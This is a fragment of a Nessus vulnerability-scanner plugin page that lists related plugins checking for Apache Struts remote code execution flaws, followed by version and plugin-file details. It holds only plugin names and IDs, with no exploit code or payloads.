  • 102918 - Apache Struts 2.3.x Struts 1 plugin RCE (remote)
  • 102977 - Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE
  • 112064 - Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)
  • 144365 - Apache Struts 2.x < 2.5.26 RCE (S2-061) (direct check)
  • 69240 - Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution
  • 57691 - Apache Struts 2 Multiple Remote Code Execution and File Overwrite Vulnerabilities (safe check) (deprecated)
  • 57850 - Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
  • 47900 - Apache Struts 2 / XWork Remote Code Execution (safe check)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file struts_2_5_10_1_rce.nasl version 1.25. For more plugins, visit the Nessus Plugin Library.

Go back to menu.